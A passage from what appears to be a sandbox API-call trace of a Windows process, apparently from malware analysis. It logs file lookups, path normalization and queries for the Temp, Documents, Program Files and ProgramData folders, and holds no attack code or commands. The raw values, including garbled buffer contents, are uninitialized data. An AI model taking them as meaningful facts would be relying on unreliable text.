lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0171.565] GetLastError () returned 0x2 [0171.565] SysReAllocStringLen (in: pbstr=0x28fa14*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28fa14*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0171.565] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local", len=0x1f | out: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local") returned 1 [0171.565] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x28f524, lpFilePart=0x28f520 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local", lpFilePart=0x28f520*="Local") returned 0x1f [0171.566] SysReAllocStringLen (in: pbstr=0x28f764*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f764*="C:") returned 1 [0171.566] SysReAllocStringLen (in: pbstr=0x28f720*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f720*="C:\\") returned 1 [0171.566] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.566] SysReAllocStringLen (in: pbstr=0x28f71c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f71c*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0171.566] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\keecfm~1\\appdata\\") returned 0x1a [0171.566] SetLastError (dwErrCode=0x0) [0171.566] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0171.566] GetLastError () returned 0x0 [0171.566] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x28f7a0, ftCreationTime.dwLowDateTime=0x775d43cd, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x15, ftLastAccessTime.dwHighDateTime=0x48, ftLastWriteTime.dwLowDateTime=0x10ec424, ftLastWriteTime.dwHighDateTime=0x28f7c0, nFileSizeHigh=0x775d4628, nFileSizeLow=0x10ec424, dwReserved0=0x28f7dc, dwReserved1=0x48, cFileName="쓴Ďﳈ(P", cAlternateFileName="쒌Ď뺄Ď>")) returned 0xffffffff [0171.567] GetLastError () returned 0x2 [0171.567] SysReAllocStringLen (in: pbstr=0x28f75c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f75c*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0171.567] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\", psz="C:\\Users\\KEECFM~1\\AppData", len=0x19 | out: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData") returned 1 [0171.567] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData", nBufferLength=0x104, lpBuffer=0x28f26c, lpFilePart=0x28f268 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData", lpFilePart=0x28f268*="AppData") returned 0x19 [0171.568] SysReAllocStringLen (in: pbstr=0x28f4ac*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f4ac*="C:") returned 1 [0171.568] SysReAllocStringLen (in: pbstr=0x28f468*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f468*="C:\\") returned 1 [0171.568] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.568] SysReAllocStringLen (in: pbstr=0x28f464*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f464*="C:\\Users\\KEECFM~1\\") returned 1 [0171.568] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\", cchLength=0x12 | out: lpsz="c:\\users\\keecfm~1\\") returned 0x12 [0171.568] SetLastError (dwErrCode=0x0) [0171.568] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0171.568] GetLastError () returned 0x0 [0171.568] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x28f65c, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1cffa3e, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x10d0000, nFileSizeHigh=0x40, nFileSizeLow=0x10e68e8, dwReserved0=0x28f524, dwReserved1=0x3e, cFileName="쒌Ď塚(P", cAlternateFileName="椼Ď柔Ď2")) returned 0xffffffff [0171.574] GetLastError () returned 0x2 [0171.574] SysReAllocStringLen (in: pbstr=0x28f4a4*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f4a4*="C:\\Users\\KEECFM~1\\") returned 1 [0171.574] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\", psz="C:\\Users\\KEECFM~1", len=0x11 | out: pbstr=0x28f72c*="C:\\Users\\KEECFM~1") returned 1 [0171.574] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1", nBufferLength=0x104, lpBuffer=0x28efb4, lpFilePart=0x28efb0 | out: lpBuffer="C:\\Users\\KEECFM~1", lpFilePart=0x28efb0*="KEECFM~1") returned 0x11 [0171.575] SysReAllocStringLen (in: pbstr=0x28f1f4*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f1f4*="C:") returned 1 [0171.575] SysReAllocStringLen (in: pbstr=0x28f1b0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f1b0*="C:\\") returned 1 [0171.575] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.575] SysReAllocStringLen (in: pbstr=0x28f1ac*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1ac*="C:\\Users\\") returned 1 [0171.575] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0171.575] SetLastError (dwErrCode=0x0) [0171.575] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0171.575] GetLastError () returned 0x0 [0171.575] FindFirstFileW (in: lpFileName="C:\\Users\\" (normalized: "c:\\users"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x28f3a4, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1cffa3e, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x10d0000, nFileSizeHigh=0x40, nFileSizeLow=0x10e6858, dwReserved0=0x28f26c, dwReserved1=0x32, cFileName="椼Ď(@", cAlternateFileName="둌Ď댴Ď\"")) returned 0xffffffff [0171.576] GetLastError () returned 0x2 [0171.576] SysReAllocStringLen (in: pbstr=0x28f1ec*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1ec*="C:\\Users\\") returned 1 [0171.576] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x28f474*="C:\\Users") returned 1 [0171.576] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x28ecfc, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users", lpFilePart=0x28ecf8*="Users") returned 0x8 [0171.577] SysReAllocStringLen (in: pbstr=0x28ef3c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ef3c*="C:") returned 1 [0171.577] SysReAllocStringLen (in: pbstr=0x28eef8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef8*="C:\\") returned 1 [0171.577] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.577] SysReAllocStringLen (in: pbstr=0x28eef4*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef4*="C:\\") returned 1 [0171.577] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.577] SetLastError (dwErrCode=0x0) [0171.577] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0171.577] GetLastError () returned 0x0 [0171.578] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28efb4, dwReserved1=0x22, cFileName="Users", cAlternateFileName="")) returned 0x10ec3c8 [0171.578] FileTimeToLocalFileTime (in: lpFileTime=0x28ef74, lpLocalFileTime=0x28eef0 | out: lpLocalFileTime=0x28eef0) returned 1 [0171.578] FileTimeToDosDateTime (in: lpFileTime=0x28eef0, lpFatDate=0x28ef42, lpFatTime=0x28ef40 | out: lpFatDate=0x28ef42, lpFatTime=0x28ef40) returned 1 [0171.578] FindClose (in: hFindFile=0x10ec3c8 | out: hFindFile=0x10ec3c8) returned 1 [0171.579] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x28f474*="C:\\Users") returned 1 [0171.579] SysReAllocStringLen (in: pbstr=0x28f1e4*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x28f1e4*="C:\\Users") returned 1 [0171.579] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f474*="C:\\Users\\") returned 1 [0171.579] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f26c, dwReserved1=0x32, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x10ec3c8 [0171.580] FileTimeToLocalFileTime (in: lpFileTime=0x28f22c, lpLocalFileTime=0x28f1a8 | out: lpLocalFileTime=0x28f1a8) returned 1 [0171.580] FileTimeToDosDateTime (in: lpFileTime=0x28f1a8, lpFatDate=0x28f1fa, lpFatTime=0x28f1f8 | out: lpFatDate=0x28f1fa, lpFatTime=0x28f1f8) returned 1 [0171.580] FindClose (in: hFindFile=0x10ec3c8 | out: hFindFile=0x10ec3c8) returned 1 [0171.581] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1", psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj") returned 1 [0171.581] SysReAllocStringLen (in: pbstr=0x28f49c*=0x0, psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f49c*="C:\\Users\\kEecfMwgj") returned 1 [0171.581] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj", psz="C:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\") returned 1 [0171.581] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f524, dwReserved1=0x3e, cFileName="AppData", cAlternateFileName="")) returned 0x10ec3c8 [0171.581] FileTimeToLocalFileTime (in: lpFileTime=0x28f4e4, lpLocalFileTime=0x28f460 | out: lpLocalFileTime=0x28f460) returned 1 [0171.582] FileTimeToDosDateTime (in: lpFileTime=0x28f460, lpFatDate=0x28f4b2, lpFatTime=0x28f4b0 | out: lpFatDate=0x28f4b2, lpFatTime=0x28f4b0) returned 1 [0171.582] FindClose (in: hFindFile=0x10ec3c8 | out: hFindFile=0x10ec3c8) returned 1 [0171.583] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0171.583] SysReAllocStringLen (in: pbstr=0x28f754*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f754*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0171.583] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0171.583] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f7dc, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0x10ec3c8 [0171.583] FileTimeToLocalFileTime (in: lpFileTime=0x28f79c, lpLocalFileTime=0x28f718 | out: lpLocalFileTime=0x28f718) returned 1 [0171.583] FileTimeToDosDateTime (in: lpFileTime=0x28f718, lpFatDate=0x28f76a, lpFatTime=0x28f768 | out: lpFatDate=0x28f76a, lpFatTime=0x28f768) returned 1 [0171.584] FindClose (in: hFindFile=0x10ec3c8 | out: hFindFile=0x10ec3c8) returned 1 [0171.595] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0171.596] SysReAllocStringLen (in: pbstr=0x28fa0c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28fa0c*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0171.596] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0171.596] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0x10ec3c8 [0171.596] FileTimeToLocalFileTime (in: lpFileTime=0x28fa54, lpLocalFileTime=0x28f9d0 | out: lpLocalFileTime=0x28f9d0) returned 1 [0171.596] FileTimeToDosDateTime (in: lpFileTime=0x28f9d0, lpFatDate=0x28fa22, lpFatTime=0x28fa20 | out: lpFatDate=0x28fa22, lpFatTime=0x28fa20) returned 1 [0171.597] FindClose (in: hFindFile=0x10ec3c8 | out: hFindFile=0x10ec3c8) returned 1 [0171.597] SysReAllocStringLen (in: pbstr=0x28fcdc*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fcdc*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0171.598] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fda0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0171.598] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0171.598] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", cchLength=0x26 | out: lpsz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 0x26 [0171.598] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x28fda0*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0171.598] SysReAllocStringLen (in: pbstr=0x33e25bc*=0x0, psz="c:\\users\\keecfmwgj\\appdata\\local\\temp\\", len=0x26 | out: pbstr=0x33e25bc*="c:\\users\\keecfmwgj\\appdata\\local\\temp\\") returned 1 [0171.599] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x33f1c98 | out: pszPath="C:\\Users\\kEecfMwgj\\Documents") returned 0x0 [0171.611] SysReAllocStringLen (in: pbstr=0x28fd90*=0x0, psz="C:\\Users\\kEecfMwgj\\Documents", len=0x1c | out: pbstr=0x28fd90*="C:\\Users\\kEecfMwgj\\Documents") returned 1 [0171.611] SysReAllocStringLen (in: pbstr=0x28fd94*=0x0, psz="C:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0171.611] GetThreadLocale () returned 0x409 [0171.612] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.612] GetThreadLocale () returned 0x409 [0171.612] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\kEecfMwgj\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.612] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\", lpFilePart=0x28fa90*=0x0) returned 0x1d [0171.612] SysReAllocStringLen (in: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\", psz="C:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0171.612] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\kEecfMwgj\\Documents\\", len=0x1d | out: pbstr=0x28fcc0*="C:\\Users\\kEecfMwgj\\Documents\\") returned 1 [0171.612] CharLowerBuffW (in: lpsz="C:\\Users\\kEecfMwgj\\Documents\\", cchLength=0x1d | out: lpsz="c:\\users\\keecfmwgj\\documents\\") returned 0x1d [0171.612] SysReAllocStringLen (in: pbstr=0x28fd94*="C:\\Users\\kEecfMwgj\\Documents\\", psz="c:\\users\\keecfmwgj\\documents\\", len=0x1d | out: pbstr=0x28fd94*="c:\\users\\keecfmwgj\\documents\\") returned 1 [0171.613] SysReAllocStringLen (in: pbstr=0x33e25ac*=0x0, psz="c:\\users\\keecfmwgj\\documents\\", len=0x1d | out: pbstr=0x33e25ac*="c:\\users\\keecfmwgj\\documents\\") returned 1 [0171.613] SHGetFolderPathW (in: hwnd=0x0, csidl=46, hToken=0x0, dwFlags=0x0, pszPath=0x33f1c98 | out: pszPath="C:\\Users\\Public\\Documents") returned 0x0 [0171.622] SysReAllocStringLen (in: pbstr=0x28fd84*=0x0, psz="C:\\Users\\Public\\Documents", len=0x19 | out: pbstr=0x28fd84*="C:\\Users\\Public\\Documents") returned 1 [0171.622] SysReAllocStringLen (in: pbstr=0x28fd88*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\") returned 1 [0171.622] GetThreadLocale () returned 0x409 [0171.622] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.622] GetThreadLocale () returned 0x409 [0171.623] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\Public\\Documents\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.623] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Documents\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\Public\\Documents\\", lpFilePart=0x28fa90*=0x0) returned 0x1a [0171.623] SysReAllocStringLen (in: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\", psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\") returned 1 [0171.623] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Users\\Public\\Documents\\", len=0x1a | out: pbstr=0x28fcc0*="C:\\Users\\Public\\Documents\\") returned 1 [0171.623] CharLowerBuffW (in: lpsz="C:\\Users\\Public\\Documents\\", cchLength=0x1a | out: lpsz="c:\\users\\public\\documents\\") returned 0x1a [0171.623] SysReAllocStringLen (in: pbstr=0x28fd88*="C:\\Users\\Public\\Documents\\", psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0x28fd88*="c:\\users\\public\\documents\\") returned 1 [0171.623] SysReAllocStringLen (in: pbstr=0x33e25c0*=0x0, psz="c:\\users\\public\\documents\\", len=0x1a | out: pbstr=0x33e25c0*="c:\\users\\public\\documents\\") returned 1 [0171.623] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x33f1c98 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0171.629] SysReAllocStringLen (in: pbstr=0x28fd78*=0x0, psz="C:\\Program Files (x86)", len=0x16 | out: pbstr=0x28fd78*="C:\\Program Files (x86)") returned 1 [0171.630] SysReAllocStringLen (in: pbstr=0x28fd7c*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fd7c*="C:\\Program Files (x86)\\") returned 1 [0171.630] GetThreadLocale () returned 0x409 [0171.630] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.630] GetThreadLocale () returned 0x409 [0171.630] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.630] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Program Files (x86)\\", lpFilePart=0x28fa90*=0x0) returned 0x17 [0171.630] SysReAllocStringLen (in: pbstr=0x28fd7c*="C:\\Program Files (x86)\\", psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fd7c*="C:\\Program Files (x86)\\") returned 1 [0171.630] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\Program Files (x86)\\", len=0x17 | out: pbstr=0x28fcc0*="C:\\Program Files (x86)\\") returned 1 [0171.630] CharLowerBuffW (in: lpsz="C:\\Program Files (x86)\\", cchLength=0x17 | out: lpsz="c:\\program files (x86)\\") returned 0x17 [0171.631] SysReAllocStringLen (in: pbstr=0x28fd7c*="C:\\Program Files (x86)\\", psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0x28fd7c*="c:\\program files (x86)\\") returned 1 [0171.631] SysReAllocStringLen (in: pbstr=0x33e25c4*=0x0, psz="c:\\program files (x86)\\", len=0x17 | out: pbstr=0x33e25c4*="c:\\program files (x86)\\") returned 1 [0171.631] SHGetFolderPathW (in: hwnd=0x0, csidl=35, hToken=0x0, dwFlags=0x0, pszPath=0x33f1c98 | out: pszPath="C:\\ProgramData") returned 0x0 [0171.689] SysReAllocStringLen (in: pbstr=0x28fd6c*=0x0, psz="C:\\ProgramData", len=0xe | out: pbstr=0x28fd6c*="C:\\ProgramData") returned 1 [0171.689] SysReAllocStringLen (in: pbstr=0x28fd70*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x28fd70*="C:\\ProgramData\\") returned 1 [0171.689] GetThreadLocale () returned 0x409 [0171.689] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.690] GetThreadLocale () returned 0x409 [0171.690] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\ProgramData\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.690] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\ProgramData\\", lpFilePart=0x28fa90*=0x0) returned 0xf [0171.690] SysReAllocStringLen (in: pbstr=0x28fd70*="C:\\ProgramData\\", psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x28fd70*="C:\\ProgramData\\") returned 1 [0171.690] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="C:\\ProgramData\\", len=0xf | out: pbstr=0x28fcc0*="C:\\ProgramData\\") returned 1 [0171.690] CharLowerBuffW (in: lpsz="C:\\ProgramData\\", cchLength=0xf | out: lpsz="c:\\programdata\\") returned 0xf [0171.690] SysReAllocStringLen (in: pbstr=0x28fd70*="C:\\ProgramData\\", psz="c:\\programdata\\", len=0xf | out: pbstr=0x28fd70*="c:\\programdata\\") returned 1 [0171.690] SysReAllocStringLen (in: pbstr=0x33e25c8*=0x0, psz="c:\\programdata\\", len=0xf | out: pbstr=0x33e25c8*="c:\\programdata\\") returned 1 [0171.690] SHGetFolderPathW (in: hwnd=0x0, csidl=43, hToken=0x0, dwFlags=0x0, pszPath=0x33f1c98 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 0x0 [0171.694] SysReAllocStringLen (in: pbstr=0x28fd60*=0x0, psz="C:\\Program Files (x86)\\Common Files", len=0x23 | out: pbstr=0x28fd60*="C:\\Program Files (x86)\\Common Files") returned 1 [0171.715] SysReAllocStringLen (in: pbstr=0x28fd64*=0x0, psz="C:\\Program Files (x86)\\Common Files\\", len=0x24 | out: pbstr=0x28fd64*="C:\\Program Files (x86)\\Common Files\\") returned 1 [0171.716] GetThreadLocale () returned 0x409 [0171.716] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Common Files\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.716] GetThreadLocale () returned 0x409 [0171.716] CompareStringW 